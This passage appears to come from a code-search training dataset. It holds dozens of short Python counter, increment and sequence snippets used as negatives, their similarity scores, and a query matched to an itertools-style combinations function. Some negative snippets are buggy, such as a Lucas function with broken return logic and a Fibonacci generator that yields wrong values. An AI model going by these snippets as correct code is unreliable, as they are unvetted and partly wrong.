inc):\n self.done += inc", "def increment(self, index, value):\n self._inrange(index)\n if value==0:\n return\n found,ii = self._find_index(index)\n if found:\n self.value[ii] += value\n if self.value[ii] == 0:\n del self.index[ii]\n del self.value[ii]\n else:\n self.index.insert(ii, index)\n self.value.insert(ii, value)", "def count():\r\n c = eNine.get()\r\n eNine.delete(0, END)\r\n count = int(c)\r\n count += 1\r\n eNine.insert(0, count)", "def convertebasenbase10(baseorig, numero):\n base10 = 0\n for i in range(len(numero)-1, -1, -1):\n base10 += DIGITOS.index(numero[i]) * baseorig**(len(numero)-i-1)\n\n return base10", "def increase(self):\n self.counter[0] += 1\n\n for x in range(len(self.sequences) -1):\n if self.counter[x] == len(self.sequences[x]) + 1:\n self.counter[x] = 0\n self.counter[x+1] += 1", "def lucas(n):\n \n A = 2\n B = 1\n Counter = 1\n C = 0 \n \n while Counter <= n:\n C = A + B\n A = B\n B = C\n Counter = Counter + 1\n if (Counter + 1) == n:\n return C", "def fget(self):\n if not hasattr(self, \"_n\"):\n self._n = 0\n self._n += 1\n return self._n", "def inc_bytes(a):\n out = list(a)\n for i in reversed(range(len(out))):\n if out[i] == 0xFF:\n out[i] = 0\n else:\n out[i] += 1\n break\n return bytes(out)", "def increment(self):\n self.increments += 1\n if self.increments == self.length:\n self.finished = True", "def _inc(self, val):\r\n assert(len(val) == self.sequence_length)\r\n return self.sequence_string[(self.sequence_string.index(val)+1) % len(self.sequence_string)]", "def t_fibonnaci():\n a = 1\n b = 1\n c = a + b\n while True:\n yield c\n a = b + c\n b = c + a \n c = a + b", "def Bnum(n):\n n = int(n)\n a = {}\n for m in xrange(0, n+1):\n a[m] = 1/(m+1)\n for j in reversed(xrange(1, m+1)):\n a[j-1] = j*(a[j-1] - a[j])\n return a[0]", "def incr_registers(self):\n pass", "def increment(self):\n self.data[self.pointer] += 1\n self.data[self.pointer] %= 256", "def _get_next_free_id_(bases, start_index=1):\r\n \r\n biggest_id = int(start_index)\r\n \r\n for base in bases:\r\n current_id = base.get_id()\r\n if current_id != None or current_id != '':\r\n if current_id > biggest_id:\r\n biggest_id = current_id\r\n \r\n return str(int(biggest_id) + 1)", "def increment(cls, value):\r\n value.value += 1", "def fibo(n):\n first = 0\n second = 1\n for i in range (1,n+1):\n if (i<=1): \n #begins sequence (terms 0 and 1 do not have two prior terms)\n newVal = i\n else:\n #continues sequence by adding the previous two numbers in the\n #sequence, and updating the variables\n newVal = first + second\n first = second\n second = newVal\n print(i,newVal)", "def increment(self) -> global___Expression:", "def incrment_1(x):\n return(x + 1)", "def numerize():\n pass", "def numer(self, a):\n raise NotImplementedError", "def progressive_number(qty=None, id_filename=None):\n assert qty is None or qty > 0, \\\n \"Argument `qty` must be a positive integer\"\n if id_filename is None:\n id_filename = os.environ.get('GC3PIE_ID_FILE',\n os.path.expanduser('~/.gc3/next_id.txt'))\n # ensure directory exists, otherwise the error message is obscure;\n # see Issue 486 for details\n id_dirname = dirname(id_filename)\n if not os.path.exists(id_dirname):\n os.makedirs(id_dirname)\n # XXX: can raise 'LockTimeout'\n lck = lock(id_filename, timeout=30, create=True)\n id_file = open(id_filename, 'r+')\n id = int(id_file.read(8) or \"0\", 16)\n id_file.seek(0)\n if qty is None:\n id_file.write(\n \"%08x -- DO NOT REMOVE OR ALTER THIS FILE: it is used internally\"\n \" by the gc3libs\\n\" % (id + 1))\n else:\n id_file.write(\n \"%08x -- DO NOT REMOVE OR ALTER THIS FILE: it is used internally\"\n \" by the gc3libs\\n\" % (id + qty))\n id_file.close()\n unlock(lck)\n if qty is None:\n return id + 1\n else:\n return [(id + n) for n in range(1, qty + 1)]", "def fibonacci(num):\n counter = 0\n\n # Start fibonacci\n sequence = [0, 1]\n while len(sequence) < num:\n n1 = sequence[counter]\n n2 = sequence[counter + 1]\n sequence.append(n1+n2)\n\n counter += 1\n\n return sequence", "def _get_next_sequence_number(self):\n cur = self._next_sequence_number\n self._next_sequence_number += 1\n return cur", "def counter(self) -> int:", "def counter(self) -> int:", "def calculate(self, b):\n self.n_steps = self.n_steps + 1\n self.length = b.length\n self.natoms = b.natoms\n for i in range(0,self.natoms-1):\n for j in range(i+1,self.natoms):\n rij = (b.atoms[i].xyz - b.atoms[j].xyz)\n rij = rij - self.pbc_correction(rij)\n mag_rij = la.norm(rij)\n bin_no = int(round(mag_rij/self.dr))\n if bin_no <= self.n_max:\n self.gr[bin_no] = self.gr[bin_no] + 1", "def addition_mod(a, b, nbr):\n bina = [int(x) for x in bin(a)[2:]]\n binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n #print(binn)\n while len(bina) >= len(binb):\n binb = [0]+binb\n while len(bina) < len(binb)-1:\n bina = [0]+bina\n while len(binn) < len(bina):\n binn = [0]+binn\n while len(binn) > len(bina):\n bina = [0]+bina\n binb = [0]+binb\n binn.reverse()\n bina.reverse()\n binb.reverse()\n #print(bina, binb, binn)\n n = len(bina)+len(binb)+len(binn)\n na = len(bina)\n nab = len(bina)+len(binb)\n q = QuantumRegister(n+2, 'q')\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binb)):\n if binb[i]:\n circ.x(q[na+i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[nab+i])\n addmod(circ, q, # A, B, lost, last, N, lost2, binn):\n [q[i] for i in range(len(bina))],\n [q[i+na] for i in range(len(binb)-1)],\n q[n],\n q[na+len(binb)-1],\n [q[i+nab] for i in range(len(binn))],\n q[n+1],\n binn)\n circ_m = measure(circ, q, [i for i in range(na,nab)])\n return circ_m", "def increment2(cls, var):\r\n var += 1", "def nom(meal, i1):\n # Iterators\n #numOfIts = len(meal)\n #its = [i1 for i1 in range(0,numOfIts)]\n #its = [0,2,1,6, len(meal)]\n #its = createIts(meal)\n numOfIts = len(its)\n \n newnom = 0\n for i2 in range(0,numOfIts):\n newnom += int(meal[its[i2]+i1]) + primes[i2]\n #print(primes[i2])\n #print(\"newnom =\", newnom)\n \n newnom = str(newnom % 10)\n return newnom", "def list2int(thelist,base=2):\n return reduce(lambda x,y:base*x+y,reversed(thelist),0", "def increment(self):\n self.pos += 1\n if self.pos == len(self.progress) - 1:\n self.pos = 0", "def post_seqnoincrease(self):", "def __get_sequence_number(self):\n if self.counter > 999:\n self.counter = 0\n else:\n self.counter += 1\n\n str_sequence_num = self.counter + 256\n str_hex_sequence_num = hex(str_sequence_num)[2:]\n return str_hex_sequence_num", "def increment(self, amount):\n pass", "def base(num,conv,rem=0,baseResult=[]):\r\n if num==0:\r\n strResult=''\r\n for i in baseResult[::-1]:\r\n strResult+=str(i)\r\n return int(strResult)\r\n else:\r\n baseResult.append(num%conv)\r\n return base(num//conv,conv,num%conv,baseResult)", "def counter(self, value: int, /) -> None:", "def RecCountup(n):\n if n == 0:\n return print('0')\n RecCountup(n - 1)\n print(n)", "def safe_incr(self, number: int, addition: int = 1) -> int:\n summed = number + addition\n return summed if summed < TWO_BYTES else summed % TWO_BYTES", "def radix(self) -> int:\n raise NotImplementedError", "def lucas_iter(n):\n f = []\n for x in range(n + 1):\n if x == 0:\n f.append(2)\n elif x == 1:\n f.append(1)\n else:\n f.append(f[-1] + f[-2])\n return f[-1]", "def num_to_idx(cls, num: int, n_chaps: int) -> int:\n if num > 0:\n return num - 1\n if num < 0:\n return n_chaps + num\n return 0", "def count_digit(x, i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su", "def ccw(i):\n return (i + 1) % 3", "def PRGA_custom(tab):\n i = 0\n j = 0\n while True:\n i = (i + 1) % MOD\n j = (j + tab[i]) % MOD\n yield i+j", "def cyclic_index_i_plus_1(i, length):\n return i + 1 if i + 1 < length else 0", "def I (self, n):", "def increment_count(self):\n self.image_count +=1\n if self.image_count > self.max_count:\n self.image_count = self.count_start # overflow", "def getNextOrderNum(cur,vID):\n orderNum = execute_query(cur,\"\"\"SELECT Count(*) FROM OpenTasks where vID = ?\"\"\", [vID])[0][0]\n orderNum = int(orderNum) + 1\n return orderNum", "def increment(self, n=1):\n with self.current_counter.get_lock():\n self.current_counter.value += n", "def get_seq_num():\n t = datetime.datetime.now()\n mt = time.mktime(t.timetuple())\n nextnum = int(mt)\n retval = nextnum % 10000000\n return retval", "def plusOne(self, digits: List[int]) -> List[int]:\n n = len(digits)\n for i in reversed(range(n)):\n # set all the nines at the end of array to zeros\n if digits[i] == 9:\n digits[i] = 0\n\n # here we have the rightmost not-nine \n else:\n # increase this rightmost not-nine by 1\n digits[i] += 1\n #done\n return digits\n\n # we're here because all the digits are nines\n return [1] + digits", "def incr_id(id, n):\n return id[:-1] + (id[-1] + n,)" ]
[ "0.67676866", "0.62549233", "0.62549233", "0.6254061", "0.62319183", "0.6182245", "0.6147752", "0.608569", "0.60396475", "0.60262215", "0.5960267", "0.5946531", "0.5906772", "0.58969176", "0.58864105", "0.5877408", "0.58636934", "0.58469784", "0.5830072", "0.5778208", "0.5726589", "0.5720135", "0.56943625", "0.5676869", "0.5660773", "0.56565106", "0.565127", "0.5621926", "0.56209505", "0.55911636", "0.55893856", "0.55871785", "0.55822045", "0.5572834", "0.55521375", "0.55486614", "0.5536826", "0.5525152", "0.5524839", "0.55225337", "0.55191326", "0.5512361", "0.5495489", "0.54851437", "0.54652727", "0.5462349", "0.5443118", "0.5439216", "0.54369164", "0.5432487", "0.543237", "0.54216814", "0.54157054", "0.54088557", "0.5401402", "0.5398678", "0.53788805", "0.53759205", "0.5374503", "0.53727573", "0.5357067", "0.53562427", "0.53498447", "0.5339844", "0.53383225", "0.53305686", "0.53304625", "0.53286445", "0.5326938", "0.53222835", "0.53176343", "0.53144103", "0.53144103", "0.5300539", "0.5300124", "0.5289199", "0.5283967", "0.5280124", "0.52659786", "0.5264491", "0.5263976", "0.52632123", "0.5262041", "0.5255409", "0.52540725", "0.5252959", "0.5252761", "0.52457374", "0.52353185", "0.52351004", "0.5231484", "0.52127963", "0.5211072", "0.52058893", "0.52019304", "0.51960593", "0.5195007", "0.51906836", "0.51894164", "0.51812685" ]
0.62286186
5
combinations('ABCD', 2) > AB AC AD BC BD CD combinations(range(4), 3) > 012 013 023 123
def combinations(iterable, r): pool = tuple(iterable) n = len(pool) if r > n: return indices = list(range(r)) yield tuple(pool[i] for i in indices) while True: for i in reversed(range(r)): if indices[i] != i + n - r: break else: return indices[i] += 1 for j in range(i+1, r): indices[j] = indices[j-1] + 1 yield tuple(pool[i] for i in indices)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def combinations(s, n):\n return (\"\".join(x) for x in tuples(s,n))", "def combinations(*comb, **kw):\n return _fixture_functions.combinations(*comb, **kw)", "def part_2():\n return itertools.permutations(range(5, 10))", "def get_combinations(text):\n combinations = []\n arr = []\n slen = len(text)\n __find_factor(slen,slen,combinations,arr)\n \n elements = []\n for comb in combinations:\n tmp = [0] + comb\n elements.append([text[tmp[i]:tmp[i]+tmp[i+1]] for i in range(len(tmp)-1)])\n return elements", "def test_combinations(self):\r\n self.assertFloatEqual(combinations(5, 3), 10)\r\n self.assertFloatEqual(combinations(5, 2), 10)\r\n # only one way to pick no items or the same number of items\r\n self.assertFloatEqual(combinations(123456789, 0), 1)\r\n self.assertFloatEqual(combinations(123456789, 123456789), 1)\r\n # n ways to pick one item\r\n self.assertFloatEqual(combinations(123456789, 1), 123456789)\r\n # n(n-1)/2 ways to pick 2 items\r\n self.assertFloatEqual(\r\n combinations(\r\n 123456789,\r\n 2),\r\n 123456789 *\r\n 123456788 /\r\n 2)\r\n # check an arbitrary value in R\r\n self.assertFloatEqual(combinations(1234567, 12), 2.617073e64)", "def CombinationMethods(nums, elements_number):\n res = list(c(nums, elements_number))\n return res, Combination(len(nums), elements_number)", "def exercise_b2_2():\r\n letters = ['a', 'e', 'i', 'o', 'u', 'u']\r\n combinations = list(permutations(letters))\r\n uniq_combinations = set(combinations)\r\n total_possibilities = len(combinations)\r\n total_uniq_possibilities = len(uniq_combinations)\r\n print(\"\\nThere are %s possible combinations and %s unique combinations for this set\\n\" \r\n % (total_possibilities, total_uniq_possibilities))\r\n return", "def test_n_choose_n(self):\n self.assertEqual(wordlib.combinations(5, 5), 1)", "def AllCombinations(data, comblength):\n return [c for c in itertools.combinations(data, comblength)]", "def _combinations(n_features, n_args, interaction_only):\n comb = combinations if interaction_only else combinations_w_r\n return comb(range(n_features), n_args)", "def part_1():\n return itertools.permutations(range(5))", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def get_combo(starting_letter, length): # Apparently ngrams beyond bigrams only have two letter file names. Still keeping this for generality, but should always be run with length=2 in this context\n alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n combos = list(itertools.combinations(alpha, length - 1))\n combos = [starting_letter + ''.join(item) for item in combos]\n\n return combos", "def generate_alphabet_combinations(length: int = 2) -> List[str]:\n assert length > 0\n alphabets = string.ascii_lowercase\n\n return [\n ''.join(combination)\n for n in range(1, length+1)\n for combination in product(alphabets, repeat=n)\n ]", "def Demo():\n print(Combination(8, 4))\n print(CombinationMethods([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3))", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def part2(data): # pylint: disable=line-too-long\n combinations_up_to = {0: 1}\n for d in sorted(data):\n val = 0\n for i in range(1, 3 + 1):\n if d - i in combinations_up_to:\n val += combinations_up_to[d - i]\n combinations_up_to[d] = val\n return combinations_up_to[max(data)]", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def get_pairs(terms):\n return itertools.combinations(terms, 2)", "def representative_combos(list_1: list[str], list_2: list[str]) -> list[tuple[str, str]]:\n all_selected_combinations: list[tuple[str, str]] = []\n for i in range(max(len(list_1), len(list_2))):\n all_selected_combinations.append((list_1[i % len(list_1)], list_2[i % len(list_2)]))\n return all_selected_combinations", "def alpha_chars_pairs (text):\n alpha_text = list (alpha_chars (text))\n return itertools.combinations (alpha_text)", "def get_paren_combos():\n results = [None] * 4\n options = [('%s', '(%s)')]\n for i in range(1, 4):\n results[i] = list(itertools.product(*(i * options)))\n return results", "def combinations(self):\n return self._combinations", "def word_combination(wlist:list) -> list :\r\n\r\n if wlist and len(wlist)>1:\r\n return chain(*map(lambda x: combinations(wlist, x), range(1, len(wlist)+1)))\r\n else :\r\n return wlist", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def get_combinations(self):\n all_steps = self.do_steps()\n self.option = [k for k, v in all_steps.items()]\n result = itertools.product(*(v for k, v in all_steps.items()))\n return result", "def perm_2_let():\r\n return {''.join(i) for i in permutations('abcdefghijklmnopqrstuvwxyz', 2)}\r\n # print(comb_2_let, sep='')\r", "def combinations(n, k):\n return factorial(n) / (factorial(k) * factorial(n - k))", "def powerset(xs):\n cards = list(reversed(xrange(len(xs)))) + [len(xs)]\n return list(chain.from_iterable(combinations(xs, n) for n in cards))", "def binary_compositions(n):\n return productrange(*[2]*(n-1))", "def powerset(s):\n return chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))", "def pattern_list(k):\r\n p_list=[]\r\n for i in list(itertools.product('ACGT', repeat=k)):\r\n x = ''.join(i)\r\n p_list.append(x)\r\n return p_list", "def test_get_n_bits_combinations():\n # Check n=1 - Pass\n assert layer_util.get_n_bits_combinations(1) == [[0], [1]]\n # Check n=2 - Pass\n assert layer_util.get_n_bits_combinations(2) == [[0, 0], [0, 1], [1, 0], [1, 1]]\n\n # Check n=3 - Pass\n assert layer_util.get_n_bits_combinations(3) == [\n [0, 0, 0],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 0],\n [1, 1, 1],\n ]", "def estimateCombinations(self):\n\n # Note: We use floating point, not exact arithmetic.\n allCharsCount = 0.0\n combinations = 1.0\n\n # Count combinations for the forced characters.\n for chars in self.categories:\n combinations *= len(chars)\n allCharsCount += len(chars)\n\n # Multiply by combinations for the unforced characters.\n combinations *= allCharsCount ** (self.length - len(self.categories))\n\n return combinations", "def generate_combinations(k: int, n: int):\n result = list()\n for i in range(1, k + 1):\n for bits in itertools.combinations(range(n), i):\n s = [0] * n\n for bit in bits:\n s[bit] = 1\n result.append(s)\n\n return pd.DataFrame(result)", "def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def corner_combinations(zdim: int):\n return combinations(range(zdim), 2)", "def power_1(s):\n from itertools import combinations\n return [list(c) for i in range(len(s) + 1) for c in combinations(s, i)]", "def TAoCPpermutation(n,k):\n perms = []\n for subset in itertools.combinations(range(n), k):\n A = []; B = []; C = []; min = 0; j = 0; up = 0\n for i in xrange(n):\n if(j>=k or i != subset[j]):\n B.append(i)\n up +=1\n else:\n up -=1\n j += 1\n if(up < min):\n min = up\n B.append(i)\n else:\n A.append(i)\n C.append(B.pop())\n perms.append(A+B+C)\n return perms", "def genSubset2(L):\n import itertools\n result = []\n for i in range(len(L) + 1):\n result += list(itertools.combinations(L, i))\n return result", "def combo(N,K):\n assert type(N)==list\n assert type(K)==int\n for k in N:\n assert type(k)==int\n assert K>0 and K<=len(N)\n \n main_combo = []\n #Finds the power list of the inputted list and loops through the power list for lists with length 'K'.\n for l in power_list(N):\n if len(l)==K:\n main_combo.append(l)\n return main_combo #Returns a list of list combinations with length 'K'.", "def item_combinations(items, combo_range):\n if combo_range.start < 0 or combo_range.stop < 0:\n raise ValueError(\"Range must not be negative\")\n elif (\n combo_range.start == combo_range.stop\n or combo_range.start == 0\n and combo_range.stop == 1\n ):\n # Choices are of length zero\n return []\n\n full_length_combos = []\n if combo_range.start == 0:\n no_choice = [None for _ in range(combo_range.stop - 1)]\n full_length_combos.append(tuple(no_choice))\n combo_range = range(1, combo_range.stop)\n\n expected_length = combo_range.stop - 1\n for length in combo_range:\n combos = itertools.combinations(items, length)\n if length < expected_length:\n combos = [c + tuple([None] * (expected_length - length)) for c in combos]\n full_length_combos.extend(combos)\n\n return full_length_combos", "def combinations(n, k):\r\n return exp(gammaln(n + 1) - gammaln(k + 1) - gammaln(n - k + 1))", "def combos(array,n=2): \n # base case\n if n==0:\n yield frozenset()\n return\n\n # core recursion\n for c in set(combos(array,n-1)):\n for i in array:\n #added this to avoid duplicate combos\n if i not in c:\n # add element i to combo c\n yield frozenset({i})| c", "def Combinations(n, k):\n if int(n) != n or int(k) != k or n < k or k <= 0:\n return None\n\n if k == n:\n return [range(n)]\n elif k == 1:\n return [[ii] for ii in range(n)]\n\n combinations = Combinations(n-1, k)\n combinations_append_last = Combinations(n-1, k-1)\n for ii in range(len(combinations_append_last)):\n combination = combinations_append_last[ii]\n combination.append(n-1)\n combinations.append(combination)\n return combinations", "def combine(combination_input):\n\n output = sum([map(list, itertools.combinations(combination_input, i)) for i in range(len(combination_input) + 1)], [])\n output_final = [sorted(i) for i in output if len(i)>1]\n\n return sorted(output_final)", "def pythagoras():\r\n pl = []\r\n range_ = int(input(\r\n \"Enter the range up to which you want to find the combination of the pythagoras numbers: \"))\r\n for a in range(1, range_+1):\r\n for b in range(a, range_+1):\r\n for c in range(b, range_+1):\r\n if a**2+b**2 == c**2:\r\n pl.append([a, b, c])\r\n elif b**2+c**2 == a**2:\r\n pl.append([a, b, c])\r\n elif c**2+a**2 == b**2:\r\n pl.append([a, b, c])\r\n return pl", "def main():\n\n import sys\n sys.setrecursionlimit(10**7)\n from itertools import accumulate, combinations, permutations, product # https://docs.python.org/ja/3/library/itertools.html\n # accumulate() returns iterator! to get list: list(accumulate())\n from math import factorial, ceil, floor\n def factorize(n):\n \"\"\"return the factors of the Arg and count of each factor\n \n Args:\n n (long): number to be resolved into factors\n \n Returns:\n list of tuples: factorize(220) returns [(2, 2), (5, 1), (11, 1)]\n \"\"\"\n fct = [] # prime factor\n b, e = 2, 0 # base, exponent\n while b * b <= n:\n while n % b == 0:\n n = n // b\n e = e + 1\n if e > 0:\n fct.append((b, e))\n b, e = b + 1, 0\n if n > 1:\n fct.append((n, 1))\n return fct\n def combinations_count(n, r):\n \"\"\"Return the number of selecting r pieces of items from n kinds of items.\n \n Args:\n n (long): number\n r (long): number\n \n Raises:\n Exception: not defined when n or r is negative\n \n Returns:\n long: number\n \"\"\"\n # TODO: How should I do when n - r is negative?\n if n < 0 or r < 0:\n raise Exception('combinations_count(n, r) not defined when n or r is negative')\n if n - r < r: r = n - r\n if r < 0: return 0\n if r == 0: return 1\n if r == 1: return n\n numerator = [n - r + k + 1 for k in range(r)]\n denominator = [k + 1 for k in range(r)]\n for p in range(2,r+1):\n pivot = denominator[p - 1]\n if pivot > 1:\n offset = (n - r) % p\n for k in range(p-1,r,p):\n numerator[k - offset] /= pivot\n denominator[k] /= pivot\n result = 1\n for k in range(r):\n if numerator[k] > 1:\n result *= int(numerator[k])\n return result\n def combinations_with_replacement_count(n, r):\n \"\"\"Return the number of selecting r pieces of items from n kinds of items allowing individual elements to be repeated more than once.\n \n Args:\n n (long): number\n r (long): number\n \n Raises:\n Exception: not defined when n or r is negative\n \n Returns:\n long: number\n \"\"\"\n if n < 0 or r < 0:\n raise Exception('combinations_with_replacement_count(n, r) not defined when n or r is negative')\n elif n == 0:\n return 1\n else:\n return combinations_count(n + r - 1, r)\n from bisect import bisect_left, bisect_right\n from collections import deque, Counter, defaultdict # https://docs.python.org/ja/3/library/collections.html#collections.deque\n from heapq import heapify, heappop, heappush, heappushpop, heapreplace,nlargest,nsmallest # https://docs.python.org/ja/3/library/heapq.html\n from copy import deepcopy, copy # https://docs.python.org/ja/3/library/copy.html\n from operator import itemgetter\n # ex1: List.sort(key=itemgetter(1))\n # ex2: sorted(tuples, key=itemgetter(1,2))\n from functools import reduce\n def chmin(x, y):\n \"\"\"change minimum\n if x > y, x = y and return (x, True).\n convenient when solving problems of dp[i]\n \n Args:\n x (long): current minimum value\n y (long): potential minimum value\n \n Returns:\n (x, bool): (x, True) when updated, else (x, False)\n \"\"\"\n if x > y:\n x = y\n return (x, True)\n else:\n return (x, False)\n def chmax(x, y):\n \"\"\"change maximum\n if x < y, x = y and return (x, True).\n convenient when solving problems of dp[i]\n \n Args:\n x (long): current maximum value\n y (long): potential maximum value\n \n Returns:\n (x, bool): (x, True) when updated, else (x, False)\n \"\"\"\n if x < y:\n x = y\n return (x, True)\n else:\n return (x, False)\n\n from fractions import gcd # Deprecated since version 3.5: Use math.gcd() instead.\n def gcds(numbers):\n return reduce(gcd, numbers)\n def lcm(x, y):\n return (x * y) // gcd(x, y)\n def lcms(numbers):\n return reduce(lcm, numbers, 1)\n\n # first create factorial_list\n # fac_list = mod_factorial_list(n)\n INF = 10 ** 18\n MOD = 10 ** 9 + 7\n modpow = lambda a, n, p = MOD: pow(a, n, p) # Recursive function in python is slow!\n def modinv(a, p = MOD):\n # evaluate reciprocal using Fermat's little theorem:\n # a**(p-1) is identical to 1 (mod p) when a and p is coprime\n return modpow(a, p-2, p)\n def modinv_list(n, p = MOD):\n if n <= 1:\n return [0,1][:n+1]\n else:\n inv_t = [0,1]\n for i in range(2, n+1):\n inv_t += [inv_t[p % i] * (p - int(p / i)) % p]\n return inv_t\n def modfactorial_list(n, p = MOD):\n if n == 0:\n return [1]\n else:\n l = [0] * (n+1)\n tmp = 1\n for i in range(1, n+1):\n tmp = tmp * i % p\n l[i] = tmp\n return l\n def modcomb(n, k, fac_list = [], p = MOD):\n # fac_list = modfactorial_list(100)\n # print(modcomb(100, 5, modfactorial_list(100)))\n from math import factorial\n if n < 0 or k < 0 or n < k: return 0\n if n == 0 or k == 0: return 1\n if len(fac_list) <= n:\n a = factorial(n) % p\n b = factorial(k) % p\n c = factorial(n-k) % p\n else:\n a = fac_list[n]\n b = fac_list[k]\n c = fac_list[n-k]\n return (a * modpow(b, p-2, p) * modpow(c, p-2, p)) % p\n def modadd(a, b, p = MOD):\n return (a + b) % MOD\n def modsub(a, b, p = MOD):\n return (a - b) % p\n def modmul(a, b, p = MOD):\n return ((a % p) * (b % p)) % p\n def moddiv(a, b, p = MOD):\n return modmul(a, modpow(b, p-2, p))\n\n \"\"\" initialize variables and set inputs\n # initialize variables\n # to initialize list, use [0] * n\n # to initialize two dimentional array, use [[0] * N for _ in range(N)]\n # set inputs\n # open(0).read() is a convenient method:\n # ex) n, m, *x = map(int, open(0).read().split())\n # min(x[::2]) - max(x[1::2])\n # ex2) *x, = map(int, open(0).read().split())\n # don't forget to add comma after *x if only one variable is used\n # preprocessing\n # transpose = [x for x in zip(*data)]\n # ex) [[1, 2, 3], [4, 5, 6], [7, 8, 9]] => [(1, 4, 7), (2, 5, 8), (3, 6, 9)]\n # flat = [flatten for inner in data for flatten in inner]\n # ex) [[1, 2, 3], [4, 5, 6], [7, 8, 9]] => [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # calculate and output\n # output pattern\n # ex1) print(*l) => when l = [2, 5, 6], printed 2 5 6\n \"\"\"\n\n # functions used\n r = lambda: sys.stdin.readline().strip()\n r_int = lambda: int(r())\n R = lambda: list(map(int, r().split()))\n Rfloat = lambda: list(map(float, r().split()))\n Rtuple = lambda: tuple(map(int, r().split()))\n Rmap = lambda: map(int, r().split())\n\n \"\"\" how to treat input\n # single int: int(r())\n # single string: r()\n # single float: float(r())\n # line int: R()\n # line string: r().split()\n # line (str, int, int): [j if i == 0 else int(j) for i, j in enumerate(r().split())]\n # lines int: [R() for _ in range(n)]\n \"\"\"\n\n # main\n N, Q = R()\n STX = [R() for _ in range(N)]\n STX.sort(key=itemgetter(2))\n\n D = [int(r()) for _ in range(Q)]\n Stopped = [-1] * Q\n ans = [-1] * Q\n\n for s, t, x in STX:\n l = bisect_left(D, s-x)\n r = bisect_left(D,t-x)\n a = l\n while a < r:\n if Stopped[a] == -1:\n ans[a] = x\n Stopped[a] = r\n a += 1\n else:\n a = Stopped[a]\n\n for i in ans:\n print(i)\n\n \"\"\"memo: how to use defaultdict of list\n # initialize\n Dic = defaultdict(list)\n # append / extend\n Dic[x].append(y)\n # for\n for k, v in Dic.items():\n \"\"\"", "def generate_repeats(min_size, max_size):\n generated_repeats = []\n alphabet = ['A', 'C', 'G', 'T']\n expanded_set = set()\n repeat_set = set()\n for i in range(min_size, max_size+1):\n for combination in product(alphabet, repeat=i):\n repeat = ''.join(combination)\n repeat_revcomp = rev_comp(repeat)\n expanded = expand_repeat(repeat, max_size)\n if expanded in expanded_set:\n continue\n else:\n repeat_cycles = get_cycles(repeat)\n for cycle in repeat_cycles:\n strand = '+'\n string = expand_repeat(cycle, max_size)\n expanded_set.add(string)\n if cycle not in repeat_set:\n repeat_set.add(cycle)\n generated_repeats.append('\\t'.join([cycle, repeat, str(len(cycle)), strand]))\n if repeat_revcomp == repeat:\n continue\n repeat_cycles = get_cycles(repeat_revcomp)\n for cycle in repeat_cycles:\n strand = '-'\n string = expand_repeat(cycle, max_size)\n expanded_set.add(string)\n if cycle not in repeat_set:\n repeat_set.add(cycle)\n generated_repeats.append('\\t'.join([cycle, repeat, str(len(cycle)), strand]))\n return generated_repeats", "def letters_generator():\n def multiletters(seq):\n for n in itertools.count(1):\n for s in itertools.product(seq, repeat=n):\n yield \"\".join(s)\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n return multiletters(letters)", "def combinations(n) -> float:\r\n c = math.factorial(n) / (math.factorial(2) * math.factorial(n - 2))\r\n return c", "def myCombinations(iterable, r):\n for perm in itertools.permutations(iterable, r):\n if sorted(perm) == list(perm):\n yield perm", "def r_combinations(n,r):\n return r_permutations(n,r) / math.factorial(r)", "def create_combinations(rnd_sol_1, start_id):\n\n store_all_combinations = []\n rnd_sol_1 = rnd_sol_1[1:]\n route_index = range(len(rnd_sol_1)-1)\n list_of_n = list(combinations(route_index, 2))\n\n for swap1, swap2 in list_of_n:\n x_swap = rnd_sol_1[:]\n x_swap[swap1], x_swap[swap2] = x_swap[swap2], x_swap[swap1]\n store_all_combinations.append([start_id] + x_swap)\n \n return store_all_combinations", "def find_words(text):\n print \"finding combinations\"\n length = len(text)\n n = length - 1\n num_combos = 2 ** (length - 1)\n\n bins = []\n for i in range(num_combos):\n num = bin(i).rsplit('b', 1)[1]\n num_str = num.zfill(n)\n bins.append(num_str)\n\n total_combos = []\n for binary_num in bins:\n combo = []\n for i in range(n):\n if binary_num[i] == '1':\n combo.append(text[i])\n combo.append(',')\n else:\n combo.append(text[i])\n\n combo.append(text[-1])\n combo = ''.join(combo)\n combo = combo.split(',')\n total_combos.append(combo)\n\n return total_combos", "def lists_combinations(list_1, list_2):\n return [x[0] + ' ' + x[1] for x in itertools.product(list_1, list_2)]", "def _get_argument_combinations(arguments):\n arg_names = 